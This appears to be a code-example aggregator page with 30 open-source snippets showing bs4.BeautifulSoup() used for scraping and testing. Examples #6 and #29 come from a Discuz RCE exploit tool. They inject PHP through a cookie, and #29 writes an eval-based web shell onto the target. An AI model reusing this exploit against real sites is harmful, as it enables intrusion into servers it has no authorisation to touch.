Python bs4.BeautifulSoup() Examples

The following are 30 code examples of bs4.BeautifulSoup(), taken from open-source projects. Each example notes the source file, project, and license it comes from. You may also want to check out the other available functions and classes of the bs4 module.
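Before the project-specific examples, here is a minimal sketch of the pattern most of them follow: obtain some HTML (here a hard-coded string, purely for illustration), pass it to bs4.BeautifulSoup() together with a parser name, and query the resulting tree with find(), find_all(), or select(). The HTML and tag names below are invented for this sketch; 'html.parser' is the standard-library parser, while 'lxml' and 'html5lib', used by several examples below, are optional third-party parsers.

from bs4 import BeautifulSoup

# A tiny, made-up HTML document used only for this sketch.
html = """
<html>
  <head><title>Example page</title></head>
  <body>
    <div class="entry"><a href="/first">First link</a></div>
    <div class="entry"><a href="/second">Second link</a></div>
  </body>
</html>
"""

soup = BeautifulSoup(html, 'html.parser')

print(soup.title.string)  # -> Example page
for div in soup.find_all('div', class_='entry'):
    print(div.a['href'])  # -> /first, /second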
Example #1
Source File: start.py    From Starx_Pixiv_Collector with MIT License
def get_pixiv_user_name():
    global login_status
    tag = 'Get_Pixiv_User_Name'
    # Check if cookies works.
    pixiv_www_url = 'https://www.pixiv.net/'
    check_soup = BeautifulSoup(get_text_from_url(pixiv_www_url), 'html.parser')
    try:
        pixiv_user_nick_name = check_soup.find(name='a', attrs={'class': 'user-name js-click-trackable-later'}).string
        print_with_tag(tag, ['Login as', pixiv_user_nick_name])
    except Exception as e:
        print_with_tag(tag,['Error:',e])
        login_status = False
        print_with_tag(tag,'Failed to check the user name.')
        print_with_tag(tag,'Might be the cookies is out of the date?')
    else:
        login_status = True
        print_with_tag(tag,'Login success!')

Example #2
Source File: gitgot.py    From GitGot with GNU Lesser General Public License v3.0
def gist_fetch(query, page_idx, total_items=1000):
    gist_url = "https://gist.github.com/search?utf8=%E2%9C%93&q={}&p={}"
    query = urllib.parse.quote(query)
    gists = []

    try:
        resp = requests.get(gist_url.format(query, page_idx))
        soup = bs4.BeautifulSoup(resp.text, 'html.parser')
        total_items = min(total_items, int(
            [x.text.split()[0] for x in soup.find_all('h3')
                if "gist results" in x.text][0].replace(',', '')))
        gists = [x.get("href") for x in soup.findAll(
                            "a", class_="link-overlay")]
    except IndexError:
        return {"data": None, "total_items": 0}

    return {"data": gists, "total_items": total_items} 
Example #3
Source File: universal.py    From xalpha with MIT License
def get_rt_from_ft(code, _type="indices"):
    url = make_ft_url(code, _type=_type)
    r = rget(url)
    b = BeautifulSoup(r.text, "lxml")
    d = {}
    d["name"] = b.find("h1").string
    d["current"] = _float(b.find("span", class_="mod-ui-data-list__value").string)
    d["percent"] = _float(
        b.select("span[class^='mod-format--']")[0].text.split("/")[-1].strip()[:-1]
    )
    d["current_ext"] = None
    d["market"] = None
    d["currency"] = b.find("span", class_="mod-ui-data-list__label").string.split("(")[
        1
    ][:-1]
    d["time"] = b.find("div", class_="mod-disclaimer").string
    return d 
Example #4
Source File: misc.py    From xalpha with MIT License
def get_tdx_holidays(holidays=None, format="%Y-%m-%d"):
    r = rget("https://www.tdx.com.cn/url/holiday/")
    r.encoding = "gbk"
    b = BeautifulSoup(r.text, "lxml")
    l = b.find("textarea").string.split("\n")
    if not holidays:
        holidays = {}
    for item in l:
        if item.strip():
            c = item.split("|")
            if c[2] in region_trans:
                rg = region_trans[c[2]]
                tobj = dt.datetime.strptime(c[0], "%Y%m%d")
                tstr = tobj.strftime(format)
                if rg not in holidays:
                    holidays[rg] = [tstr]
                else:
                    holidays[rg].append(tstr)
    return holidays 
Example #5
Source File: test_exceptions_handler.py    From sanic with MIT License
def test_chained_exception_handler():
    request, response = exception_handler_app.test_client.get(
        "/6/0", debug=True
    )
    assert response.status == 500

    soup = BeautifulSoup(response.body, "html.parser")
    html = str(soup)

    assert "response = handler(request, *args, **kwargs)" in html
    assert "handler_6" in html
    assert "foo = 1 / arg" in html
    assert "ValueError" in html
    assert "The above exception was the direct cause" in html

    summary_text = " ".join(soup.select(".summary")[0].text.split())
    assert (
        "ZeroDivisionError: division by zero while handling path /6/0"
    ) == summary_text 
Example #6
Source File: dz-ml-rce.py    From discuz-ml-rce with MIT License
def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):

    tgtUrl = tgtUrl
    check_payload = setcookie_language_value + '\'.phpinfo().\';'
    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
    headers["Cookie"] = check_payload;

    check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
    #print headers['Cookie']
    if check_rsp.status_code == 200:
        try:
            if (check_rsp.text.index('PHP Version')):
                print 'target is vulnerable!!!'

            else:
                soup = BeautifulSoup(check_rsp.text, 'lxml')
                if (soup.find('title')):
                    print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
        except ValueError, e:
                print 'target seem not vulnerable-' + e.__repr__()
        except: 
Example #7
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_edit_and_preview_links_on_schema_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/schema/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/schema/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None 
Example #8
Source File: start.py    From Starx_Pixiv_Collector with MIT License
def get_illust_infos_from_illust_url(url):
    data_dict = {}
    illust_url_content = get_text_from_url(url)
    # illust_url_content.encoding = 'unicode_escape'
    new_soup = BeautifulSoup(illust_url_content,'html.parser')
    json_data = new_soup.find(name='meta',attrs={'name':'preload-data'}).attrs['content']
    format_json_data = demjson.decode(json_data)
    pre_catch_id = list(format_json_data['illust'].keys())[0]
    illust_info = format_json_data['illust'][pre_catch_id]
    # get each value
    data_dict['illustId'] = illust_info['illustId']
    data_dict['illustTitle'] = illust_info['illustTitle']
    data_dict['illustComment'] = illust_info['illustComment']
    data_dict['createDate'] = illust_info['createDate']
    data_dict['illustType'] = illust_info['illustType']
    data_dict['urls'] = illust_info['urls']
    # data_dict['tags']=illust_info['tags']
    data_dict['userId'] = illust_info['userId']
    data_dict['userName'] = illust_info['userName']
    data_dict['userAccount'] = illust_info['userAccount']
    data_dict['likeData'] = illust_info['likeData']
    data_dict['width'] = illust_info['width']
    data_dict['height'] = illust_info['height']
    data_dict['pageCount'] = illust_info['pageCount']
    data_dict['bookmarkCount'] = illust_info['bookmarkCount']
    data_dict['likeCount'] = illust_info['likeCount']
    data_dict['commentCount'] = illust_info['commentCount']
    data_dict['viewCount'] = illust_info['viewCount']
    data_dict['isOriginal'] = illust_info['isOriginal']
    per_tags = illust_info['tags']['tags']
    tags_list = []
    for tag in range(len(per_tags)):
        tags_list.append(per_tags[tag]['tag'])
    data_dict['tags'] = tags_list
    ###########################################################
    update_database(data_dict['illustId'], data_dict['illustTitle'], data_dict['illustType'], data_dict['userId'],
                    data_dict['userName'], data_dict['tags'], data_dict['urls'])
    return data_dict 
Example #9
Source File: ebay-watcher.py    From ebay-watcher with MIT License
def watch(self):
        '''
        () -> None
        Attempts to watch a product on eBay.
        '''
        # Get product watch link
        try:
            r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
        except:
            try:
                r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
            except:
                log('e', "Connection failed while loading product on " + self.product_link)
                return

        try:
            watch_link = soup(r.text, "html.parser").find("div", {"id": "vi-atl-lnk"}).a["href"]
        except:
            log('e', "Connection failed while loading product on " + self.product_link)
            return
            
        # Watch the product (the second GET actually adds it to watch list)
        try:
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
        except:
            try:
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
            except:
                log('e', "Failed to add " + self.product_link + " to watch list.")
                return
                

        # Alert user of progress: Watch product success/failure
        if("saved in your" in r.text.lower()):
            log('s', "Added " + self.product_link + " to watch list.")
        else:
            log('e', "Couldn't add " + self.product_link + " to watch list.") 
Example #10
Source File: google.py    From fireprox with GNU General Public License v3.0
def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&start={count}&num=100'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('div', class_='r'):
			link = g.find_all('a')[0]['href']
			title = g.find_all('h3')[0]
			item = f'{title.text} ({link})'
			search_results.add(item)
			idx+=1 
Example #11
Source File: bing.py    From fireprox with GNU General Public License v3.0
def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&first={count}'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('li', class_='b_algo'):
			result = g.find('h2')
			link = result.find('a')['href']
			title = result.text
			item = f'{title} ({link})'
			search_results.add(item)
			idx+=1 
Example #12
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_edit_and_preview_links_on_department_admin_page(self, testapp):
        ''' There are links to preview & edit main and schema pages from the department admin page.
        '''
        department = Department.create(name="B Police Department", short_name="BPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        response = testapp.get("/department/{}".format(department.id))
        assert response.status_code == 200
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="{}/preview/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/assaultsonofficers".format(department.id)) is not None 
Example #13
Source File: universal.py    From xalpha with MIT License
def get_portfolio_fromttjj(code, start=None, end=None):
    startobj = dt.datetime.strptime(start, "%Y%m%d")
    endobj = dt.datetime.strptime(end, "%Y%m%d")
    if (endobj - startobj).days < 90:
        return None  # note start is always 1.1 4.1 7.1 10.1 in incremental updates
    if code.startswith("F"):
        code = code[1:]
    r = rget("http://fundf10.eastmoney.com/zcpz_{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    table = s.find("table", class_="tzxq")
    df = pd.read_html(str(table))[0]
    df["date"] = pd.to_datetime(df["报告期"])
    df["stock_ratio"] = df["股票占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["bond_ratio"] = df["债券占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["cash_ratio"] = df["现金占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    #     df["dr_ratio"] = df["存托凭证占净比"].replace("---", "0%").apply(lambda s: xa.cons._float(s[:-1]))
    df["assets"] = df["净资产(亿元)"]
    df = df[::-1]
    return df[["date", "stock_ratio", "bond_ratio", "cash_ratio", "assets"]]


# this is the most elegant approach to dispatch get_daily, the definition can be this simple
# you actually don't need to bother with start/end etc., everything is taken care of by ``cachedio``
Example #14
Source File: test_admin_forms.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_edit_and_preview_links_on_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['index', 'complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None 
Example #15
Source File: Extractor.py    From News-At-Command-Line with MIT License
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="content__article-body from-content-api js-article__body")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result) 
Example #16
Source File: Extractor.py    From News-At-Command-Line with MIT License
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="article")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image","span"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result) 
Example #17
Source File: Extractor.py    From News-At-Command-Line with MIT License
def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="Normal")
        #print maincontent
        for content in maincontent:
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result) 
Example #18
Source File: views.py    From MPContribs with MIT License
def export_notebook(nb, cid):
    nb = nbformat.from_dict(nb)
    html_exporter = HTMLExporter()
    html_exporter.template_file = "basic"
    body = html_exporter.from_notebook_node(nb)[0]
    soup = BeautifulSoup(body, "html.parser")
    # mark cells with special name for toggling, and
    # TODO make element id's unique by appending cid (for ingester)
    for div in soup.find_all("div", "output_wrapper"):
        script = div.find("script")
        if script:
            script = script.contents[0]
            if script.startswith("render_json"):
                div["name"] = "HData"
            elif script.startswith("render_table"):
                div["name"] = "Tables"
            elif script.startswith("render_plot"):
                div["name"] = "Graphs"
        else:
            pre = div.find("pre")
            if pre and pre.contents[0].startswith("Structure"):
                div["name"] = "Structures"
    # name divs for toggling code_cells
    for div in soup.find_all("div", "input"):
        div["name"] = "Code"
    # separate script
    script = []
    for s in soup.find_all("script"):
        script.append(s.string)
        s.extract()  # remove javascript
    return soup.prettify(), "\n".join(script) 
Example #19
Source File: Extractor.py    From News-At-Command-Line with MIT License
def TextExtractionAlgo(self,text,htmlelement,classname):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all(htmlelement, class_=classname)
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result) 
Example #20
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_about_page_exists(self, testapp):
        response = testapp.get("/about/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="https://www.codeforamerica.org") is not None 
Example #21
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_non_public_depts_display_for_users_with_access(self, testapp):
        ''' Users can see links to datasets they're allowed to access on the front page
        '''
        impd = Department.create(name="I Police Department", short_name="IMPD", is_public=True)
        UseOfForceIncidentIMPD.create(department_id=impd.id, opaque_id="12345abcde")
        bpd = Department.create(name="B Police Department", short_name="BPD", is_public=False)
        UseOfForceIncidentBPD.create(department_id=bpd.id, opaque_id="12345abcde")
        lmpd = Department.create(name="LM Police Department", short_name="LMPD", is_public=False)
        UseOfForceIncidentLMPD.create(department_id=lmpd.id, opaque_id="12345abcde")

        # A non logged-in user can only see the public department
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user associated with a particular department can see that department's
        # available datasets when logged in
        create_and_log_in_user(testapp=testapp, department=bpd, username="user1")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user with admin access can see all departments' available datasets
        create_and_log_in_user(testapp=testapp, department=impd, rolename='admin', username="user2")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is not None

        # Log out and only the public department should be visible
        testapp.get(url_for('public.logout')).follow()
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None 
Example #22
Source File: misc.py    From xalpha with MIT License
def get_ri_status(suburl=None):
    if not suburl:
        suburl = "m=cb&a=cb_all"  # 可转债

    url = "http://www.richvest.com/index.php?"
    url += suburl
    r = rget(url, headers={"user-agent": "Mozilla/5.0"})
    b = BeautifulSoup(r.text, "lxml")
    cl = []
    for c in b.findAll("th"):
        cl.append(c.text)
    nocl = len(cl)
    rl = []
    for i, c in enumerate(b.findAll("td")):
        if i % nocl == 0:
            r = []
        r.append(c.text)
        if i % nocl == nocl - 1:
            rl.append(r)
    return pd.DataFrame(rl, columns=cl) 
Example #23
Source File: proxyLoader.py    From premeStock with MIT License
def filterConnections(proxiesList):
	workingProxies = []
	count = 0
	for proxy in proxiesList:
		count += 1
		cprint("Loading proxy # {}".format(count), "green")
		proxies = {
		  'http': proxy,
		  'https': proxy
		}
		try:
			r = requests.get("http://www.supremenewyork.com/shop/all", proxies=proxies, timeout=1)
			data = r.text
			soup = BeautifulSoup(data,"html.parser")
			headerCheck = str(soup.find("span",{"id":"time-zone-name"}).text)
			if headerCheck == "NYC":
				cprint(headerCheck, "blue")
				workingProxies.append(proxy)
				cprint("Added {}!".format(proxy),"green")
			else:
				cprint("Banned!", "red")
				raise
		except:
			cprint("Bad Proxy: {}".format(proxy), "red")
	return workingProxies 
Example #24
Source File: proxyLoader.py    From premeStock with MIT License
def site2(proxiesList):
	url = "https://www.us-proxy.org/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	r = requests.get(url,headers=user)

	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	table = soup.find("tbody")
	for ips in table.find_all("tr"):
		count = 0
		proxy = ""
		for ip in ips.find_all("td"):
			if count == 0:
				proxy = str(ip.text)
				proxy += ":"
			if count == 1:
				proxy += str(ip.text)
				proxiesList.append(proxy)
				break;
			count += 1
	cprint("Succesfully added {} proxies!".format(len(proxiesList)), 'green') 
Example #25
Source File: universal.py    From xalpha with MIT License
def get_newest_netvalue(code):
    """
    In case the latest net value from the Tiantian Fund (天天基金) aggregate API is not updated in time, fetch the fund's most recently published net value and the corresponding date. Deprecated, use get_rt("F501018") instead.

    :param code: six digits string for fund.
    :return: netvalue, %Y-%m-%d
    """
    code = code[1:]
    r = rget("http://fund.eastmoney.com/{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    return (
        float(
            s.findAll("dd", class_="dataNums")[1]
            .find("span", class_="ui-font-large")
            .string
        ),
        str(s.findAll("dt")[1]).split("(")[1].split(")")[0][7:],
    ) 
Example #26
Source File: proxyLoader.py    From premeStock with MIT License
def site4(proxiesList):
	url = "https://www.proxynova.com/proxy-server-list/country-us/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	
	r = requests.get(url,headers=user)
	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	proxy = ""
	# for ips in soup.find_all("tr",{"class":"spy1xx"}):
	for ips in soup.find_all("tr"):
		count = 0
		for ip in ips.find_all("td",{"align":"left"}):
			if count == 0:
				proxy = str(ip.get_text(strip=True).replace("document.write('","").replace("'","").replace("+","").replace(");","").replace(" ",""))
			if count == 1:
				proxy += ":"+str(ip.text).strip()
				proxiesList.append(proxy)
				break;
			count += 1 
Example #27
Source File: Self.py    From CyberTK-Self with GNU General Public License v2.0
def yt(query):
    with requests.session() as s:
         isi = []
         if query == "":
             query = "S1B tanysyz"   
         s.headers['user-agent'] = 'Mozilla/5.0'
         url    = 'http://www.youtube.com/results'
         params = {'search_query': query}
         r    = s.get(url, params=params)
         soup = BeautifulSoup(r.content, 'html5lib')
         for a in soup.select('.yt-lockup-title > a[title]'):
            if '&list=' not in a['href']:
                if 'watch?v' in a['href']:
                    b = a['href'].replace('watch?v=', '')
                    isi += ['youtu.be' + b]
         return isi 
Example #28
Source File: test_public_pages.py    From comport with BSD 3-Clause "New" or "Revised" License
def test_home_page_links_to_about(self, testapp):
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/about/") is not None 
Example #29
Source File: dz-ml-rce.py    From discuz-ml-rce with MIT License
def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
    getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
    getshell_exp_send = setcookie_language_value + getshell_exp

    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    headers['Cookie'] = getshell_exp_send

    filename = tgtUrl.split('/')[-1]

    getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if getshell_rsp.status_code == 200:
        getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
        #print tgtUrl.split('/')[-1]
        #print tgtUrl.split(filename)[0] + 'x.php'
        if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
            print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
        else:
            #soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
            print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]

    else:
        print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n' 
Example #30
Source File: get_recipes.py    From recipe-box with MIT License
def get_all_recipes_epi(page_num):
    base_url = 'http://www.epicurious.com'
    search_url_str = 'search/?content=recipe&page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)

    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item')
        recipe_links = [r['href'] for r in recipe_link_items]
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []